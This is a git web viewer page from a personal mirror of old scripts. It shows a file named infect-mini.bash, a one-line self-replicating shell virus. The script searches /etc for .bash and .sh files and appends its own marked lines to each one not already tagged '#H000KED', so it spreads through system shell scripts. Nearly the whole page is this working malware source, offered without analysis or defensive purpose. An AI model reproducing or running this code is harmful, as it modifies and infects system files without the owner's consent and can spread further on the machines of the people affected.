Added some small boring scripts and programs writen in few last years
[mirrors/Programs.git] / bash / infect / infect-mini.bash
1 for i in $( find /etc 2> /dev/null | grep -i "\.bash\$\|\.sh\$" ); do if ( fgrep "\#H000KED" $i > /dev/null ); then continue; fi; echo >> $i; cat $0 | grep \#H000KED >> $i; done;
This page took 0.285275 seconds and 4 git commands to generate.